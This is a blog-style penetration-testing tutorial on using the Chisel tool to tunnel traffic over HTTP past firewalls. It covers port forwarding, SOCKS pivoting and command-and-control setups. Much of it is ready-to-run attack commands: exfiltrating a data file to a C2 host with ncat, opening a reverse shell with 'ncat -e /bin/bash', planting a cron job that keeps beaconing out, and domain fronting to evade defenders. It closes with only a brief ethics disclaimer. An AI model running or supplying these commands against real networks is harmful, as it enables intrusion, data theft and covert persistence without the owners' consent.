Hey there fellow hackers and pen testers! If you’re reading this article, I assume you’ve got a passion for staying ahead in the game and mastering the tools that help us win big in the world of cybersecurity. Today, I’m going to share a powerful technique that has been in my arsenal for quite some time now: tunneling traffic using Chisel, an SSH-based solution over HTTP.

Chisel is a fast, reliable, and versatile tool that can help us bypass firewalls, intrusion detection systems, and other security measures by tunneling our traffic over HTTP. It’s an invaluable resource when you’re on a red team engagement or just exploring the boundaries of a network.

In this article, we’ll dive deep into the world of Chisel, exploring its functionality, setup, and use cases. I’ll provide plenty of examples and code snippets along the way, and by the end of this article, you’ll be a Chisel expert, ready to tunnel your way to victory!

So, let’s dive in!

Understanding Chisel

Chisel is a powerful open-source tool for creating secure, encrypted tunnels between two systems. Developed by jpillora, Chisel is written in Go, making it easily portable across different platforms. At its core, Chisel is an SSH client and server that speaks HTTP, allowing it to traverse firewalls and security devices that are typically configured to allow HTTP traffic.

One of Chisel’s greatest strengths is its versatility. It supports both forward and reverse tunnels, SOCKS5 proxying, and can be easily combined with other tools like Metasploit, Cobalt Strike, and even custom payloads.

Before we delve into the installation and setup process, it’s essential to understand the main components of Chisel:

  • Chisel Server: The server component listens for incoming client connections and sets up tunnels based on the client’s requests. The server can be hosted on any system with a public IP address or a domain, making it ideal for use with cloud infrastructure providers like AWS, GCP, or Azure.
  • Chisel Client: The client component connects to the Chisel server and requests specific tunnels to be set up. The client can be run on any system, including the target machine, your local machine, or a system within the target network.

With these components in mind, let’s proceed to installing and setting up Chisel.

Chisel Installation and Setup

To install Chisel, visit the GitHub repository (https://github.com/jpillora/chisel) and download the latest binary release for your operating system. Chisel is available for Linux, macOS, and Windows.

After downloading the binary, make it executable by running the following command:

chmod +x chisel

Now, you should be able to run the Chisel binary by simply executing:

./chisel

Chisel Use Cases

In this section, we’ll explore four common use cases for Chisel and see how they can be employed in real-world scenarios.

Bypassing Firewall Restrictions

One of the most common use cases for Chisel is bypassing firewall restrictions. This can be helpful when a target network has strict outbound rules that prevent you from establishing connections to your command and control (C2) infrastructure. By tunneling traffic through an allowed protocol like HTTP, you can bypass these restrictions and maintain control of compromised systems.

To bypass firewall restrictions with Chisel, first, set up the Chisel server on a publicly accessible system. Run the following command on the server:

./chisel server -p 8080 --reverse

This command starts the Chisel server on port 8080 and enables reverse tunneling. The --reverse flag is necessary for bypassing firewall restrictions, as it allows clients to initiate the connection to the server.

Next, run the Chisel client on the target machine. The client will connect to the Chisel server and request a reverse tunnel:

./chisel client http://<server-ip>:8080 R:2222:localhost:22

In this example, the client establishes a reverse tunnel from port 2222 on the Chisel server to port 22 (SSH) on the local machine. Now, you can SSH into the target machine through the Chisel server:

ssh -p 2222 user@<server-ip>

Remote Port Forwarding

Remote port forwarding allows you to forward a remote port on the target machine to a local port on your system. This is useful for accessing services on the target machine that may be restricted to local connections only.

To use Chisel for remote port forwarding, first, start the Chisel server:

./chisel server -p 8080

Next, on the target machine, run the Chisel client with the appropriate remote forwarding options:

./chisel client http://<server-ip>:8080 8081:localhost:80

In this example, the client forwards the target’s local port 80 (HTTP) to port 8081 on the Chisel server. Now, you can access the target’s HTTP service by connecting to port 8081 on the Chisel server:

curl http://<server-ip>:8081

Reverse Port Forwarding

Reverse port forwarding is the opposite of remote port forwarding. It allows you to forward a local port on your system to a remote port on the target machine. This can be useful for exposing services running on your local machine to the target network.

To set up reverse port forwarding with Chisel, first, start the Chisel server with the --reverse flag:

./chisel server -p 8080 --reverse

Then, on your local machine, run the Chisel client with the appropriate reverse forwarding options:

./chisel client http://<server-ip>:8080 R:8081:localhost:80

In this example, the client establishes a reverse tunnel from port 8081 on the target machine to port 80 (HTTP) on your local machine. Now, systems on the target network can access your local HTTP service by connecting to port 8081:

curl http://localhost:8081

SOCKS Proxy

Chisel can also be used as a SOCKS5 proxy, allowing you to tunnel all your traffic through the target network. This can be useful for browsing internal websites, accessing internal services, or pivoting deeper into the network.

To set up a SOCKS5 proxy with Chisel, first, start the Chisel server:

./chisel server -p 8080

Next, on the target machine, run the Chisel client with the --socks5 option:

./chisel client http://<server-ip>:8080 --socks5

This command establishes a SOCKS5 proxy on the target machine, which can be used to tunnel your traffic through the target network. Note the port number assigned to the SOCKS5 proxy in the client’s output.

Now, configure your local machine to use the SOCKS5 proxy. For example, you can use proxychains on Linux:

Install proxychains:

sudo apt-get install proxychains

Edit the proxychains configuration file /etc/proxychains.conf and add the following line at the end:

socks5  <server-ip> <socks5-port>

Use proxychains to tunnel your traffic through the SOCKS5 proxy:

proxychains curl http://internal-website.local

Real-World Examples

In this section, we’ll examine two real-world examples of how Chisel can be used to overcome obstacles in red team engagements and penetration testing scenarios.

Exfiltrating Data from a Restricted Network

Imagine you have compromised a system within a restricted network, and you need to exfiltrate sensitive data. However, the network has strict egress filtering, blocking common exfiltration methods like DNS, ICMP, and direct TCP connections.

In this scenario, you can use Chisel to tunnel your traffic over HTTP, which is usually allowed by firewalls. Start by setting up the Chisel server on your C2 server and enabling reverse tunneling:

./chisel server -p 8080 --reverse

Next, run the Chisel client on the target machine and establish a reverse tunnel to your C2 server:

./chisel client http://<c2-ip>:8080 R:4444:localhost:4444

With the reverse tunnel in place, you can now use tools like ncat to send the sensitive data through the tunnel:

ncat -l -p 4444 < sensitive-data.txt

On your C2 server, receive the exfiltrated data:

ncat -v <c2-ip> 4444 > exfiltrated-data.txt

Gaining Access to an Internal Web Application

Suppose you are targeting a company with an internal web application that is only accessible from within the target network. You have compromised an external-facing system but need to pivot to the internal network to access the web application.

In this case, you can use Chisel’s remote port forwarding feature to forward a port from the compromised internal system to your local machine. Start by setting up the Chisel server:

./chisel server -p 8080

Next, run the Chisel client on the compromised internal system and forward the internal web application’s port to the Chisel server:

./chisel client http://<server-ip>:8080 8081:internal-webapp.local:80

Now, you can access the internal web application from your local machine by connecting to port 8081 on the Chisel server:

curl http://<server-ip>:8081

Establishing a Chisel Beacon for Persistent C2 Communication

Imagine you have successfully compromised a target system within a restricted network, and you want to establish a persistent command and control (C2) communication channel that can bypass network monitoring and egress filtering. In this scenario, you can use Chisel as a beacon on the target system to call out to your C2 infrastructure over HTTP.

First, set up the Chisel server on your C2 server and enable reverse tunneling:

./chisel server -p 8080 --reverse

Next, deploy the Chisel client on the target system, configured to establish a reverse tunnel to your C2 server:

./chisel client http://<c2-ip>:8080 R:8888:localhost:8888 --keepalive 5m

In this example, the client establishes a reverse tunnel from port 8888 on the Chisel server to port 8888 (a custom C2 listener) on the target system. The --keepalive flag is set to 5 minutes, meaning that the Chisel client will send a heartbeat message to the server every 5 minutes to maintain the connection.

With the reverse tunnel in place, you can now send commands and receive output through the tunnel using a custom C2 listener or other tools like ncat:

On your C2 server, listen for incoming connections:

ncat -l -p 8888

On the target system, receive and execute commands through the tunnel:

ncat -e /bin/bash <c2-ip> 8888

Establishing a Periodic Chisel Beacon with Cron and Dynamic Port Forwarding

Imagine you have compromised a target system within a restricted network and want to establish a periodic command and control (C2) communication channel that can bypass network monitoring and egress filtering. In this scenario, you can use Chisel in combination with cron on the compromised system to call out to your C2 infrastructure over HTTP every few minutes, with a timeout option to give up if the C2 is not listening, and allowing the C2 to set the port forwarding rules when the Chisel client calls in.

First, set up the Chisel server on your C2 server and enable reverse tunneling:

./chisel server -p 8080 --reverse

Next, deploy the Chisel client on the target system and configure it to establish a reverse tunnel to your C2 server with a timeout option:

./chisel client http://<c2-ip>:8080 --reverse --timeout 30s

In this example, the --timeout flag is set to 30 seconds, meaning that the Chisel client will give up connecting to the server if it doesn’t receive a response within 30 seconds.

To make the Chisel client call out to your C2 infrastructure periodically, add a cron job on the compromised system:

Open the crontab file for the current user:

crontab -e

Add the following line at the end of the file to make the Chisel client call out every 5 minutes:

*/5 * * * * /path/to/chisel client http://<c2-ip>:8080 --reverse --timeout 30s >/dev/null 2>&1

Now, the Chisel client will attempt to connect to your C2 server every 5 minutes. When the client connects, you can set the port forwarding rules on the server side by running the following command:

./chisel server -p 8080 --reverse --socks5

This command enables a SOCKS5 proxy on the server side, allowing you to tunnel traffic through the target network when the Chisel client connects.

In this real-world example, Chisel, combined with cron and dynamic port forwarding, allows the target system to maintain a stealthy, periodic C2 communication channel with your infrastructure. This technique can be highly effective in bypassing network restrictions and evading detection during red team engagements and penetration testing scenarios.

Tips and Tricks for Advanced Chisel Usage

Combine Chisel with other tools: Chisel can be used in conjunction with other tools like Metasploit, Cobalt Strike, or custom payloads to establish encrypted communication channels and evade detection.

  • Use domain fronting: To further obfuscate your traffic, consider using domain fronting with Chisel. Domain fronting involves using a legitimate, high-reputation domain as a cover for your Chisel server, making it difficult for defenders to block or identify your C2 traffic. You can achieve this by hosting your Chisel server on a content delivery network (CDN) that supports domain fronting, such as Cloudflare or Amazon CloudFront.
  • Implement authentication: By default, Chisel does not require authentication for clients to connect to the server. However, you can enable authentication to prevent unauthorized access to your Chisel server. To do this, use the --auth flag on both the server and client, followed by a username and password:
./chisel server -p 8080 --reverse --auth user:password
./chisel client http://<server-ip>:8080 --auth user:password R:2222:localhost:22
  • Encrypt your Chisel traffic: Chisel uses the SSH protocol to encrypt traffic, but you can increase the security of your connection by using a tool like stunnel to wrap your Chisel traffic in an additional layer of TLS encryption.
  • Be mindful of traffic patterns: Although Chisel can bypass firewall restrictions, it’s essential to be aware of traffic patterns and avoid creating suspicious traffic that could raise alerts. For example, sending large amounts of data over HTTP at unusual times could be a red flag for security teams.

Conclusion

Chisel is a powerful, versatile tool for tunneling traffic with SSH over HTTP. Its ability to bypass firewall restrictions, forward and reverse ports, and create SOCKS proxies make it an invaluable asset in the toolkit of any professional hacker or pen tester.

In this article, we’ve covered the basics of Chisel, including installation, use cases, real-world examples, and advanced tips and tricks. With this knowledge under your belt, you’re now equipped to tackle a variety of challenges in your red team engagements and penetration testing scenarios.

Remember that with great power comes great responsibility, and always use these techniques ethically and legally. Now, go forth and conquer networks, my fellow hackers!